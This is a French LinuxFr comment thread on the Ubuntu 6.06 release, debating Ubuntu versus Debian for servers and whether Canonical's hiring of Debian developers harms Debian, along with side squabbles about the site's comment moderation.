        si tu fais des choses un feu fancy sur ton serveur et que tu te retrouves à vouloir installer RoR ou Django depuis le svn, ben Debian n'est peut-être pas approprié.


        et

        Le support de 6.06 sur les serveurs est de plus de 5 ans


        y'a pas comme un contre sens ?

        si je veux un support de 5 ans, je suppose que c'est pas pour installer des nouvelles versions tous les jours mais pour avoir des versions fixes à la sortie et des mise à jour de secu seulement pendant le cycle ? non ?

        donc au bout de 2 ans comment tu installes le svn de bidule qui a besoin de la dernière version de machin ?

        ça doit être la magie d'Ubuntu qui fait que c'est mieux que Debian !

        M.
        • [^] # Re: Ubuntu sur un serveur

          Posté par (page perso) . Évalué à 0.

          Aucun contre-sens. Bien que le sujet de la dépêche soit Ubuntu, il n'a pas dit qu'Ubuntu était mieux appropriée que Debian pour "faire des choses un peu fancy".
      • [^] # Re: Ubuntu sur un serveur

        Posté par . Évalué à 0.

        Avant tout, je tiens à préciser, histoire qu'on ne s'emmflamme pas : je ne lance pas de troll !!

        Ploum, tu écris :
        Personnellement, mes serveurs sont sous Debian. C'est un gage de stabilité, de sécurité, toussa...
        Venant de toi, ça m'étonne.
        Entendrais-tu donc qu'ubuntu n'est pas assez stable pour un serveur ?
        N'est pas assez sécurisée pour un serveur ?

        Je répète donc : Ce n'est pas un troll mais une question à quelqu'un qui a co-écrit un bouquin sur ubuntu et qui tiens de tels propos au moment de la sortie d'ubuntu avec un support, une version serveur et tout le toutim...


        Pour confirmation du non-troll : mes serveurs sont sous Sarge et j'ai deux desktops : un sous Etch, l'autre sous ubuntu.
        • [^] # Re: Ubuntu sur un serveur

          Posté par (page perso) . Évalué à 0.

          simplement que mes serveurs étaient sous Debian avant l'arrivée d'Ubuntu (époque à laquelle mon desktop était lui-même sous Debian).

          Comme ils fonctionnent très bien, pourquoi changer ?

          Le manichéisme debian-ubuntu est une pure invention de certains linuxfriens. On peut utiliser plusieurs outils dans la vie non ? Personnellement, je continue à beaucoup aimer Debian.

          Et vous savez quoi ? J'ai même administré et installé des serveurs sous RHEL ! (mais là, j'avoue que je regrettais Debian)
          • [^] # Re: Ubuntu sur un serveur

            Posté par . Évalué à 1.

            pas de raison de changer, effectivement :)

            mais c'est plus la partie Debian, C'est un gage de stabilité, de sécurité,... qui m'a interpellé...
            • [^] # Re: Ubuntu sur un serveur

              Posté par . Évalué à 1.

              Oui, et c'est pourquoi ubuntu est bâtie dessus. Ceci dit, une Ubuntu est clairement moins stable qu'une debian (je parle pas de testing/unstable/ etc.).
              • [^] # Re: Ubuntu sur un serveur

                Posté par . Évalué à 0.

                Oui, et c'est pourquoi ubuntu est bâtie dessus.
                Quelle aisance pour jouer sur les mots :)

                Ceci dit, une Ubuntu est clairement moins stable qu'une debian
                rhalalala, Je voulais que ce soit ploum qui le dise :)
    • [^] # Re: Ubuntu sur un serveur

      Posté par . Évalué à 2.

      c'est toujours un équilibre difficile... Debian a des paquets trop vieux, Ubuntu des paquets trop récents...

      Sinon, Xorg EST un problème de sécurité, alors autant ne pas l'installer sur un serveur (il suffit normalement de laisser juste les librairies minimalistes pour pouvoir connecter les applications X du serveur depuis son poste de travail, via ssh)

      Je préfère en tout cas avoir les packages récents présents dans une distribution avec des mises à jour sécurité automatisées que de me retrouver coincé à devoir compiler et packager moi-même les applications, ou les télécharger sur des sites officieux et à devoir les suivre moi-même...

      Dans certaines distributions pro, PHP5, Mysql5, ... ne font pas encore partie de la partie officielle supportée, ce qui présente tout de même un problème dès lors qu'on a besoin d'utiliser ces technologies récentes en environnement professionnel...
      • [^] # Re: Ubuntu sur un serveur

        Posté par (page perso) . Évalué à 2.

        Vient tester la mandriva cooker pour faire en sorte que ça marche dans ton cas, par défaut : mysql5+php5 et c'est dans main, donc supporté pour les patch de sécurité...

        Cette fuite vers ubuntu est peut-être bien pour l'utilisateur final, mais je pense que c'est une mauvaise chose en général, car ça "vide" les autres distributions (et donc les rapports de bugs risquent de ne plus passer en upstream)...
        • [^] # Re: Ubuntu sur un serveur

          Posté par . Évalué à 3.

          Enfin, par distribution pro, je parle de distribution supportée par de gros partenaires, comme emc, HP, IBM, Oracle,... et ne pas commencer à avoir une demi douzaine de distributions pour des tâches spécifiques (c'est d'ailleurs en grande partie à cause d'un manque de support par les sociétés comme HP que SuSE s'est fait jeter au boulot)... donc pas grand intéret de la part de l'entreprise pour laquelle je bosse pour mandriva au niveau serveurs... maintenant, si c'était dans un contexte de serveurs web, dans le cadre d'un ISP, je dis pas, Mandriva aurait sans doutes un intéret.
    • [^] # Re: Ubuntu sur un serveur

      Posté par (page perso) . Évalué à 0.

      >Nous retrouvons donc le noyau 2.6.15, le dernier Xorg, etc. Mais cette
      >démarche, ne pose-t'elle pas un problème de sécurité ?

      Il est ou le rapport? C'est pas parce que le noyau est récent qu'il est moins sécurisé que le noyau 2.6.8 avec 300 kilos de patches... Il n'y pas vraiment de rapport entre les deux... Les trous de sécu fixé dans un vieux noyau le sont aussi dans le récent...

      Il faut bien comprendre que quand debian parle de stabiliser la distribution, il s'agit avant tout de la distribution en elle meme pas des logiciels... Certe il y'a aussi du travail de se coter la mais les mainteneurs debian passent pas deux ans à debuger tel logiciel... Par contre ils se tiennent au courant des failles/bugs corrigés dans les versions récentes du dit logiciel et si leur compétence le permettent corrigent les bugs qu'ont leur remontent... Mais la longue periode de stabilisation de debian est plus du à ses objectif (multi plateforme, dépendances impécables, ...).

      Après perso, je serais plus Debian sur mes serveurs mais si la stable ne répond pas à mes besoins, je n'aurais aucun scrupules à utiliser Ubuntu qui est une tres bonne distribution(normal, c'est une debian).
      • [^] # Re: Ubuntu sur un serveur

        Posté par . Évalué à 1.

        Non, ce n'est pas une debian, Combien de fois il va falloir le répéter, ce n'est pas parce que la distribution utilise des .deb que c'est une debian.
        • [^] # Re: Ubuntu sur un serveur

          Posté par . Évalué à 2.

          Non, mais ça en est quand même très proche.
          Dernièrement j'ai fait un upgrade de Sarge vers Breezy juste en changeant mon source-list et en faisant aptitude dist-upgrade.
          Et hop 0 problème.
  • # Conférence Ubuntu à Paris

    Posté par . Évalué à 1.

    J'ai oublié de mentionner la conférence Ubuntu qui se tiendra à Paris !!!
  • # je ferais bien de retourner au lit

    Posté par (page perso) . Évalué à 10.

    une distribution dérivée périodique


    d(distribution)/dt (t) = d(distribution)/dt (t+T) ?
    • [^] # Re: je ferais bien de retourner au lit

      Posté par . Évalué à 1.

      Oui, j'ai utilisé ce terme car Ubuntu est un fork permanent de debian sid. En fait, c'est plus un fork périodique ou semestriel si tu préfère. Ubuntu fork debian sid au début de chaque nouveau cycle de développement. C'est tout du moins ce qu'expliquait Benjamin Mako Hill aux RMLL 2005.
      • [^] # Re: je ferais bien de retourner au lit

        Posté par (page perso) . Évalué à -6.

        oui c'est un fork(), avec un pipe dedans, mais le problème c'est que le pipe() il ne fonctionne quand un sens. Ils avaient pas expliqué que le pipe devait etre bidirectionnel ! ils ont mis un select() bloquant ou quoi, on attend toujours là !

        M.
  • # revenons en au fond:

    Posté par (page perso) . Évalué à -4.

    de l'avis de tout le monde ici, c'est vraiment une superbe distribution. Elle est jolie, elle s'installe toute seule et tout.

    mais bon sincèrement, qu'elle soit géniale c'est une chose, mais qu'elle tue sa mère (Debian) en essayant de la suicider, c'est mal non ? vous ne le feriez pas vous ? hein ?

    Ne vous laisser pas attendrir, c'est le diable en forme de canard.

    M.
    • [^] # Re: revenons en au fond:

      Posté par (page perso) . Évalué à 1.

      mais qu'elle tue sa mère

      c'est clair qu'elle déchire sa mère !
    • [^] # Re: revenons en au fond:

      Posté par . Évalué à 0.

      de l'avis de tout le monde ici, c'est vraiment une superbe distribution.

      Le monde est petit
    • [^] # Re: revenons en au fond:

      Posté par . Évalué à 2.

      Faut bien qu'il y ait un canard boiteux dans la famille ;-)
    • [^] # Re: revenons en au fond:

      Posté par (page perso) . Évalué à -4.

      Sur le site debian, je sais, ce n'est pas très structuré comme site mais quelque part, je ne saurais te dire où, il y a marqué que le but de debian n'était pas de faire une distrib à utiliser, si on veut, mais bien justement pour faire des distributions finales genre ubuntu qui se baserait sur debian et bien ce but est atteint !!!

      Christophe

      • [^] # Re: revenons en au fond:

        Posté par . Évalué à 3.

        Donne nous l'url plutot que de donner des informations non vérifiables.
        • [^] # Re: revenons en au fond:

          Posté par (page perso) . Évalué à -1.

          Je n'ai plus mis les les pieds sur le site debian depuis un moment, désolé.
          Tiens d'ailleurs ça me fait penser que la nouvelle version du site de ubuntu ressemble à celui de mandriva avec les 4 catégories de gens.

          Christophe

      • [^] # Re: revenons en au fond:

        Posté par (page perso) . Évalué à 1.

        Tout ce que je vois marqué sur le site de Debian, c'est "Le système d'exploitation universel" ("The Universal Operating System" en VO).
      • [^] # Re: revenons en au fond:

        Posté par (page perso) . Évalué à 8.

        Et moi je vois dans le contrat social, un des premiers liens du site (http://www.debian.org/social_contract.fr.html ) :

        4. Nos priorités sont nos utilisateurs et les logiciels libres.

        Les besoins de nos utilisateurs et de la communauté des logiciels libres nous guideront. Nous placerons leurs intérêts en tête de nos priorités.
        [snip]
        Nous permettrons, sans réclamer rétribution, que d'autres créent des distributions contenant conjointement des logiciels Debian et d'autres travaux.


        Autrement dit « Nous faisons une distributions pour nos utilisateurs. Si vous voulez baser votre distribution sur la nôtre, allez-y allègrement, c'est que du bon logiciel libre. »

        Bien loin de ce que tu racontes, en somme.
    • [^] # Re: revenons en au fond:

      Posté par (page perso) . Évalué à 3.

      C'est bien pour ca qu'il est demandé à toute personne faisant un paquet pour Ubuntu de:
      - Se basé sur le paquet debian
      - Faire remonter ses modifications à l'auteur du paquet debian
      - Suivre les corrections fait sur debian

      Bref, je vois pas vraiment en quoi Ubuntu est l'ennemi de Debian, bien au contraire...
      • [^] # Re: revenons en au fond:

        Posté par (page perso) . Évalué à -2.

        on va pas revenir dessus, fallait suivre, c'est pas moi qui le dit, ce sont des DD.

        et puis suffit de suivre un peu debian (ml & co) pour voir le manège.

        M.
        • [^] # Re: revenons en au fond:

          Posté par (page perso) . Évalué à 0.

          Si certains DDs faisaient leur boulot au lieu de passer leur temps sur les mailing-lists...
          debian-devel est un puit sans fond.
          • [^] # Re: revenons en au fond:

            Posté par . Évalué à -1.

            C'est un problème normal lorsqu'il s'agit d'une communauté de personnes volontaires. On retrouve les même problèmes dans les associations. Et ça en ne fait pas pour autant de mauvaises associations.

            4 mots: « lève-toi et contribue » au lieu de critiquer comme ça.
        • [^] # Re: revenons en au fond:

          Posté par . Évalué à 2.

          Revenir sur quoi et suivre quoi au juste ? Je n'ai toujours pas compris en quoi Ubuntu pouvait bien faire du mal à Debian.

          Tout ce que j'ai pu lire ici ou là sur le troll Debian vs Ubuntu c'est "t'à qu'à lire les arguments du fil d'à coté pour voire les preuves qu'Ubuntu fait du mal à Debian" et ce genre de choses.

          Au lieu de ruminer sans cesse que le débat à déjà eu lieu et que tous ceux qui n'étaient pas aux premières loges de la flamewar sont des idiots finis ça serait bien de donner des liens.

          BeOS le faisait il y a 15 ans !

          • [^] # Re: revenons en au fond:

            Posté par (page perso) . Évalué à 1.

            Le sujet a été largement traité ici : http://linuxfr.org/~fabrom/21718.html

            De nombreux liens ont été donnés. Des exemples concrets également. Tu peux vérifier par toi-même.
            • [^] # Re: revenons en au fond:

              Posté par . Évalué à 1.

              Si je résumé bien les arguments, Unbuntu est accusé de vampiriser Debian en maintenant stratégiquement en place des Debian Developers pour pouvoir mieux réutiliser ce que produit Debian et l'injecter dans Ubuntu.

              BeOS le faisait il y a 15 ans !

              • [^] # Re: revenons en au fond:

                Posté par (page perso) . Évalué à -1.

                Pas du tout.
                D'après les fidèles debianistes présents ici, canonical cherche simplement à tuer debian pour pouvoir suicider ubuntu.
                Super théorie non?
                • [^] # Re: revenons en au fond:

                  Posté par (page perso) . Évalué à -1.

                  tu peux essayer de tourner le truc en ridicule mais ça va plus loin qu'une gueguere de distrib. Et je crois que l'argumentation qui a été fourni sur le sujet a été assez claire.

                  M.
              • [^] # Re: revenons en au fond:

                Posté par (page perso) . Évalué à 1.

                Tu lirais pas un peu en travers, des fois ?

                Les reproches faits ont été largement plus nombreux, développés et argumentés. Il y avait, concernant la relation Debian/Ubuntu : (1) le fait d'embaucher des développeurs Debian déjà formés (même connaissant déjà les paquets) pour ensuite ne pas ménager de temps du tout pour leur activité Debian (2) le fait que la majorité des contributions sont faites de façon spécifique à Ubuntu, et demandent donc un énorme travail pour l'intégrer dans Debian (travail d'autant plus difficile à faire que ceux qui connaissent le mieux les paquets sont chez Ubuntu) (3) le fait qu'Ubuntu lui-même ne fait pas de reversement des patchs chez Debian la plupart du temps (4) le fait que sa politique de recrutement (avoir les développeurs Debian des paquets qui leur sont importants) pousse à avoir des développeurs qui restent maintainers des paquets, mais sont majoritairement inactifs en raison de (1).

                Concernant Ubuntu et le libre : (1) le fait qu'Ubuntu n'amène pas les utilisateurs à découvrir les particularités et la puissance de GNU/Linux, ce qui, à mon sens, n'en fait pas des utilisateurs à long terme (2) le fait qu'Ubuntu et consorts ont clairement leur part de responsabilité dans le constat que parmi les nouveaux utilisateurs, très peu vont devenir des développeurs (le mode de contribution "autre que du code" est largement privilégié) (3) le fait que Canonical n'embauche pas de développeurs du Libre pour vraiment développer du Libre (4) le fait que Canonical n'aide en rien les projets libres (et évidemment pas Debian), ni financièrement ni par l'hébergement, les machines, etc.

                C'est, juste de tête, une partie des arguments qui ont été développés. Je ne sais pas comment tu fais pour avoir un résumé aussi incomplet (puisqu'il représente un point sur les huit cités plus haut - et j'en oublie très certainement).
                • [^] # Re: revenons en au fond:

                  Posté par . Évalué à 1.

                  Tu me demande comment j'ai fait pour louper des arguments ?

                  C'est très simple : avec ce troll intersidéral j'ai vu linufr infiniment plus détestable que je ne l'ai jamais vu (même aux pires heures des trolls mandrake).

                  Sur toutes les bèves, tous les journaux l'ambiance est exécrable. Je commence à être excédé par cette guéguerre stérile.

                  BeOS le faisait il y a 15 ans !

                  • [^] # Re: revenons en au fond:

                    Posté par (page perso) . Évalué à 2.

                    C'est très simple : avec ce troll intersidéral j'ai vu linufr infiniment plus détestable que je ne l'ai jamais vu (même aux pires heures des trolls mandrake).

                    Effectivement : aux pires heures de trolls Mandrake, il n'y avait pas aussi d'argument. 8 arguments majeurs, souvent étayés d'exemples concrets (Python, Gnome, les paquets de JoeyH, etc.), ça n'arrive pas souvent. Exécrable.

                    Sur toutes les bèves, tous les journaux l'ambiance est exécrable. Je commence à être excédé par cette guéguerre stérile.

                    Je me demande si tu étais vraiment sur le même DLFP avant. Les discussions enflamées, les flamewars, les trolls, ça a toujours été le pain quotidien de DLFP. On y trouve des choses très intéressantes, très marrantes, etc. Et généralement, quand un gros débat a eu lieu à un moment, y a pas mal de gens pour le rappeler de façon humoristique sur d'autres journaux/etc. Si t'aimes pas ça, je crois que tu peux arrêter les commentaires de DLFP : c'est comme ça quasiment depuis que je connais DLFP. Les trolls et flamewars mémorables sont ce qui constitue la subculture DLFP.

                    Il n'y a pas particulièrement de "guéguerre". Enclenche ton mode second degré et relativise.
                    • [^] # Commentaire supprimé

                      Posté par . Évalué à 0.

                      Ce commentaire a été supprimé par l'équipe de modération.

                      • [^] # Re: revenons en au fond:

                        Posté par (page perso) . Évalué à 2.

                        Et encore une fois les devels de ubuntu sur des paquets important pour debian ils sont peut etre content d'avoir un boulot. Apres que ceux qui ont pas ete choisis soit jalous/pas content c'est une autre histoire.

                        Ah, la jalousie, évidemment... Explication tellement plus rationelle, tellement cohérente et tellement étayée d'arguments pertinents et d'exemples précis.

                        vous attendez quoi pour rajouter une clause empechant Canonical d'utiliser debian? Parceque la je voispas comment tu vas regler les problemes enonces sans cela. Interdit tout acces a debian et a ses sources et point barre. Si tu veux pas faire ca tant pis pour toi!

                        Il y a d'autres façons d'agir que l'interdiction pure. Je ne crois pas aux méthodes répressives en politique, je n'y croirai pas plus dans le monde du libre. Pointer les problèmes, les développer aux yeux de certains, c'est déjà un premier pas. D'autres semblent lire plus attentivement que toi - les retours en privé le montrent très clairement.
                • [^] # Re: revenons en au fond:

                  Posté par . Évalué à 3.

                  (1) ne plus ménager de temps du tout pour leur activité Debian


                  Gniii ?!! Si ces gars étaient à l'origine bénévole, il y a mille et une autres raisons pour que cela arrive : manque d'intérêt, mariage, naissance de gamins, problèmes persos, etc ... Alors d'un coté on tape sur Canonical, mais pour les autres raisons j'ai comme l'impression qu'on aurait rien dit. Un poids, deux mesures ? Si Debian n'a pas prévu ça, c'est 100 % de leur faute. Si leurs travaux sont si critiques, à eux de faire en sorte qu'ils puissent se transmettre à un autre, donc documenter, toussa ... Pareil pour (4).

                  Concernant Ubuntu et le libre


                  Euh, t'es au courrant qu'il y en (beaucoup) pour qui l'informatique n'est qu'un moyen pas une fin ? Même rapporter un bug, corriger une doc, ça prends du temps. Ca me rappelle un phrase un peu dure, que j'ai lue dans un forum : "il n"y que les fous furieux de l'opensource gratuit pour croire que le temps ne coûte rien." Tout le monde n'est pas informaticien, et à encore moins envie de l'être. Mais bon tu connais le cercle vicieux : pas d'utilisateurs, pas de besoins, pas de besoins pas de logiciels, pas logiciels pas d'utilisateurs.

                  En tous les cas, ce n'est pas avec la part de marché de Linux, qu'on pourra un jour avoir des drivers libres et qu'on pourra se passer d'hacks immondes pour faire tourner certains. Là encore pas de drivers potables, pas d'utilisateurs, pas d'utilisateurs, aucun intérêt de libérer les drivers.

                  Franchement, utilisateur de Mandriva, je vois plus ça comme une guéguerre stérile qui va encore provoquer des scissions à la BSD, avec tous les gâchis et les pertes de temps que cela présuppose. Diviser pour régner, qu'ils disaient. P...n, c'est pas gagné.
      • [^] # Re: revenons en au fond:

        Posté par . Évalué à -2.

        L'inverse pourrait etre possible aussi tu sais, lorsque tu as un bug chiant avec un patch le faire remonter pourrait etre interessant aussi pour debian.

        Mais non, debian peut se démerder toute seule avec ses problèmes d'égo. Personnellement je préfère avoir des gens qui ont des problèmes d'égo mais compétents plutôt que des motu incompétents qui ne sont pas capable de suivre et de faire remonter des informations à debian.
      • [^] # Re: revenons en au fond:

        Posté par . Évalué à -6.

        gnumdk: si ils font ça, je vois pas trop l'intérêt d'avoir 2 distros.

        Debian c'est fini, comme slackware

        place à Gentoo et *Ubuntu.
  • # Status de Xubuntu

    Posté par . Évalué à 3.

    Enfin Xubuntu, moins officielle pour le moment, utilise l'environnement de bureau Xfce.


    Xubuntu est aussi officielle que les autres variantes maintenant. Des isos sont disponibles (versions Desktop et Alternate).

    Cependant, les cds Xubuntu ne sont pas disponibles via shipit (pour Edgy peut-être ?).

    Elle intègre Xfce 4.3, et est vraiment une distribution desktop utilisable par tout le monde, et fonctionne très bien sur des machines anciennes.
    • [^] # Re: Status de Xubuntu

      Posté par (page perso) . Évalué à 0.

      >> Elle intègre Xfce 4.3, et est vraiment une distribution desktop utilisable par tout le monde

      Mais mais mais....la 4.3 n'est-elle pas une version de développement ?
      • [^] # Re: Status de Xubuntu

        Posté par . Évalué à 1.

        C'est bien une version de développement, même si elle est globalement très stable. Je l'utilise sur Zenwalk, et j'en suis très content. La différence la plus notable est bien sûr celui que je considère comme le meilleur explorateur de fichier : thunar.
      • [^] # Re: Status de Xubuntu

        Posté par . Évalué à -1.

        Ben Surement, mais ca ne m'etonne guère, j'ai eu l'occasion de voir sur un serveur web sur le net, une ubuntu avec un apache 2.2 du temps ou il était encore en beta. À l'époque ça m'avait choqué.

        Mais je ne pourrais te dire si l'apache etait installé via les paquets ou à la main. Bref, des doutes subsiterons toujours dans mon esprit.
  • # Non Respect

    Posté par . Évalué à 10.

    Que l'on n'apprécie ou pas cette distribution, cela regarde chacun d'entre nous, mais s'il vous plait, ce n'est pas une raison je pourir la news.
    Parce que là, on en est déjà a 50 commentaire avec une moyenne de -0,4.
    Je pense que cela montre bien qu'il y a un problème.
    Alors à la rigueur sur un journal, même si c'est dommage. Mais essayer de respecter les autres quand vous commentez les news.
    • [^] # Re: Non Respect

      Posté par . Évalué à -4.

      > Je pense que cela montre bien qu'il y a un problème.

      Ça prouve que les gens votent les comentaires. Quand les gens votent, ça se plaint. Quand ils ne votent pas, ça se plaint aussi. Allez tous vous faire enfumer par un enfumer bien cendré !

      « Je vous présente les moines Shaolin : ils recherchent la Tranquillité de l'Esprit et la Paix de l'Âme à travers le Meurtre à Main Nue »

      • [^] # Re: Non Respect

        Posté par . Évalué à -4.

        C'est un forum, pas la star'ac... une modération comme celle là est anti-constructive.
        • [^] # Re: Non Respect

          Posté par . Évalué à -6.

          Et un nick comme ragoutoutou, c'est constructif peut-être ?

          « Je vous présente les moines Shaolin : ils recherchent la Tranquillité de l'Esprit et la Paix de l'Âme à travers le Meurtre à Main Nue »

          • [^] # Re: Non Respect

            Posté par . Évalué à -6.

            Et ta remarque à la con? Et ton pseudo, il est original?
            • [^] # Re: Non Respect

              Posté par . Évalué à 0.

              Oui mon pseudo est original : je m'appelle Lucien dans la vraie vie, j'aime Linux développé initialement par Linus et il s'avère que Linuce est un anagramme de Lucien. Surprenant non ?

              « Je vous présente les moines Shaolin : ils recherchent la Tranquillité de l'Esprit et la Paix de l'Âme à travers le Meurtre à Main Nue »

              • [^] # Re: Non Respect

                Posté par (page perso) . Évalué à 1.

                trop gros, passeras pas
              • [^] # Re: Non Respect

                Posté par . Évalué à -4.

                Je suis sur le cul devant tant d'innovation ;)
                • [^] # Re: Non Respect

                  Posté par (page perso) . Évalué à -4.

                  c'est bien mon toutou, voilà ton ragou !

                  /me -> []
                • [^] # Re: Non Respect

                  Posté par . Évalué à -2.

                  Merci, tu reconnais ta défaite, tu n'es donc pas fondamentalement mauvais \o/

                  « Je vous présente les moines Shaolin : ils recherchent la Tranquillité de l'Esprit et la Paix de l'Âme à travers le Meurtre à Main Nue »

              • [^] # Re: Non Respect

                Posté par . Évalué à -2.

                s/un anagramme/une anagramme

                --> [ ]
          • [^] # Re: Non Respect

            Posté par . Évalué à -2.

            j'en suis fou de ce nick
    • [^] # Re: Non Respect

      Posté par . Évalué à -3.

      C'est là qu'on réalise à quel point le système de modération de ce site est pourri... (et je sens que mon message va encore faire baisser la moyenne)
    • [^] # Re: Non Respect

      Posté par . Évalué à 1.

      C'est marrant de dire ça après que les ubuntistes aient pourri nombre de news sur les sorties de release d'autres distributions. Je n'approuve pas, hein, mais c'est un retour de baton assez prévisible.
      • [^] # Re: Non Respect

        Posté par . Évalué à 1.

        Pourais-tu me donner des liens s'il te plait, parce que là, je viens de me tapper quelques lien de la catégorie Distribution, et je n'ai rien vu de comparable. Parce que là, on se croierait à l'assemblé nationnale.
        • [^] # Re: Non Respect

          Posté par . Évalué à 7.

          Pour Mandriva par exemple, impossible d'avoir une news sans comparaison avec Ubuntu, même quand c'est pas le sujet :
          http://www.linuxfr.org/2005/11/15/19900.html
          http://www.linuxfr.org/~kurun/19509.html
          http://linuxfr.org/~Tiberium/21654.html

          Ce n'est pas comparable, mais j'imagine que c'est la réaction à 2 ans de news non epargnées par Ubuntu, le nombre de journaux, commentaires, bref, du prosélytisme hyper lourd qui au final rend les supporters de cette distribution insupportables.
          • [^] # Re: Non Respect

            Posté par . Évalué à -2.

            Bon, ben, en tout cas, ça prouve une chose, c'est que les anti-ubuntu du forum sont plutôt bas de plafond...

            au lieu de harceler les ubuntistes avec des comparaisons avec d'autres distros, des débats incendiaires (comme certains savent le faire à la limite de la bonne foi à propos de launchpad), de poser des questions faussement naïves destinées à pointer les défauts d'ubuntu, ... on se retrouve avec une bête attaque utilisant ce stupide système de modération, et des messages à caractère anti noirs et anti homosexuels... on peut pas dire bravo.
            • [^] # Re: Non Respect

              Posté par . Évalué à 0.

              D'un autre côté... On peut en sourire quelquepart (si, si !). Attaquer sur des points aussi bas et hors propos revient à dire que l'oeuvre technique est quasi inattaquable. Ubuntu est bien, ses utilisateurs en sont contents et le clament parfois un peu trop fort. Ca fait des jaloux, et la jalousie n'amène jamais les réactions les plus intelligentes.

              Voilà ce que j'en pense, en tout cas.
              • [^] # Re: Non Respect

                Posté par . Évalué à 7.

                D'un autre côté ... l'essentiel est que tu y crois (si si, l'opératrice). Mais ce qui gave les gens comme une noix au sujet de Ubuntu, c'est l'effet Clearstream : tout le monde en parle du matin au soir, 24/24 et 7/7, ça doit être très important, mais au bout d'un moment, il faut penser à nous lâcher la grappe car on en a plein les genoux et que l'on s'en bat grave les genoux..

                Voilà ce que j'en pense (donc j'en suis), en tout cas.

                « Je vous présente les moines Shaolin : ils recherchent la Tranquillité de l'Esprit et la Paix de l'Âme à travers le Meurtre à Main Nue »

                • [^] # Re: Non Respect

                  Posté par . Évalué à 4.

                  si tu passais moins de temps sur linuxfr, t'entendrais moins parler de ubuntu.

                  Tu sais, y'a d'autres sujets intéressants que l'informatique...
                  • [^] # Re: Non Respect

                    Posté par . Évalué à -1.

                    > si tu passais moins de temps sur linuxfr, t'entendrais moins parler de ubuntu.

                    Si LinuxFr est ploumisé par Ubuntu dans son contenu, que tu y passes 5 minutes ou 5 heures, la part du contenu Ubuntesque reste la même, c'est mathématique.

                    > Tu sais, y'a d'autres sujets intéressants que l'informatique

                    Oui, je le sais. Et ? Où veux-tu en venir ?

                    « Je vous présente les moines Shaolin : ils recherchent la Tranquillité de l'Esprit et la Paix de l'Âme à travers le Meurtre à Main Nue »

              • [^] # Re: Non Respect

                Posté par (page perso) . Évalué à 8.

                Ben tiens. Et sur http://linuxfr.org/~fabrom/21718.html à aucun moment il n'y a eu de commentaire sur les pratiques réelles de Canonical et sur l'½uvre technique, c'est bien connu.

                Franchement, ça faisait des années que j'avais jamais entendu des commentaires aussi Change pas de main là, ça vient.... Ubuntu est attaquable, dans son fondement, dans sa réalisation pratique (l'inclusion de versions bêta dans des versions stables, ça choque personne ? moi énormément ; le Grub et grub-install complètement buggé de Breezy aussi ça me choquait ; et je ne parle pas du CUPS amputé avec comme seul client un client Gnome extrêmement jeune et fragile...). Mais forcément, si les gens critiquent, c'est parce qu'ils sont jaloux...

                Ben non, désolé, je suis en rien jaloux, j'en ai juste ras le bol de voir les prosélytes se masturber sur Ubuntu toute la journée en vantant sa liberté tout en s'interrogeant absolument pas sur les pratiques d'Ubuntu par rapport au Libre (parlons des pilotes non libres installés par défaut) et par rapport à Debian. J'en ai aussi ras le bol qu'on me sorte systématiquement "mais Ubuntu démocratise Linux" sans jamais me dire à quoi ça sert, la démocratisation pour la démocratisation. Les Ubuntu zealots sont actuellement les pires ennemis du Libre, ne serait-ce que pour leur discours schizophrène.
                • [^] # Re: Non Respect

                  Posté par (page perso) . Évalué à 0.

                  "J'en ai aussi ras le bol qu'on me sorte systématiquement "mais Ubuntu démocratise Linux" sans jamais me dire à quoi ça sert, la démocratisation pour la démocratisation."

                  C'est pourtant un débat que je vois revenir souvent, surtout lors d'une discussion sur les efforts que doivent/devraient/pourraient fournir les constructeurs de matériel pour mettre à disposition des pilotes libres et/ou des specs

                  Des arguments dans ce sens la j'en ai donc vu souvent.

                  Par contre des arguments anti-ubuntu, à part 2/3 arguments techniques je vois surtout un discours anti canonical

                  Quand au fait de choisir d'inclure des versions de developpement dans les distribs, ca ne me dérange pas du tout si c'est la meilleure solution (puis je n'ai pas vraiment vu de retours sur cups à part pour des problèmes de pilotes)

                  Ce qui me fait le plus chier, c'est les pro-debian qui n'arretent pas de crier au vol/viol de leur distrib, alors que debian affiche fièrement qu'ils se rejouissent que d'autres sortent des distribs debian-based car cela prouve leur talent.
                  • [^] # Re: Non Respect

                    Posté par (page perso) . Évalué à 3.

                    Ce qui me fait le plus chier, c'est les pro-debian qui n'arretent pas de crier au vol/viol de leur distrib, alors que debian affiche fièrement qu'ils se rejouissent que d'autres sortent des distribs debian-based car cela prouve leur talent.


                    ils crient car Mark S. à voulu faire sa distrib dans son petit coin et n'as pas suivi ses engagements comme part exemple faire profiter Debian de son travail.

                    Et bien, il n'en n'est rien, on attend tjs des trucs constructifs.

                    M.
                  • [^] # Re: Non Respect

                    Posté par . Évalué à 1.

                    Ce qui me fait le plus chier, c'est les pro-debian qui n'arretent pas de crier au vol/viol de leur distrib, alors que debian affiche fièrement qu'ils se rejouissent que d'autres sortent des distribs debian-based car cela prouve leur talent.

                    Des distributions debian-based, il y en a beaucoup.
                    Alors pourquoi il n'y a que ubuntu qui est "attaqué" par les pro-debian ?
                    • [^] # Re: Non Respect

                      Posté par (page perso) . Évalué à 1.

                      Alors pourquoi il n'y a que ubuntu qui est "attaqué" par les pro-debian ?


                      Parce que Ubuntu/Canonical à trop d'influence dans le developpement de Debian du fait qu'elle a embauché des DD clé de Debian. Et c'est volontairement, car ça lui permet de garder une certaine main mise sur Debian et sur ce quoi elle se base. Ca permet également que Ubuntu puisse s'appuyer sur tout le travail de Debian sans avoir à multiplier le travail d'adaptation car ils pompent à max dans Debian, et il customise 2/3 trucs et mettent un coup de peinture.

                      et c'est là qu'est le problème, la présence de Canonical commence à se faire un peu trop sentir à mon goût.

                      M.
                      • [^] # Re: Non Respect

                        Posté par . Évalué à 2.

                        les DD de debian n'ont pas été embauchés de force. Bref ils font partie de debian. Si debian souffre, c'est donc surtout à cause d'elle-même :)
                        • [^] # Re: Non Respect

                          Posté par (page perso) . Évalué à -3.

                          nan debian souffre car ces DD sont obligés de travailler sur Ubuntu avant tout et délaisse ou repousse à plus tard leur travail sur Debian.

                          M.
                          • [^] # Re: Non Respect

                            Posté par (page perso) . Évalué à 9.

                            C'est clair que d'être obligé de travailler pour la boîte qui les paie, ça doit les gêner profondément, alors qu'ils pourraient être au chômage et packager toute la journée.
                            • [^] # Re: Non Respect

                              Posté par (page perso) . Évalué à 8.

                              Ce que je ne comprends pas, c'est pourquoi on les fait travailler sur des paquets Ubuntu ?
                              Ils serait plus judicieux, à mon sens, de les faire travailler sur les paquets Debian directement, puisque ceux-ci sont intégrés par Ubuntu.
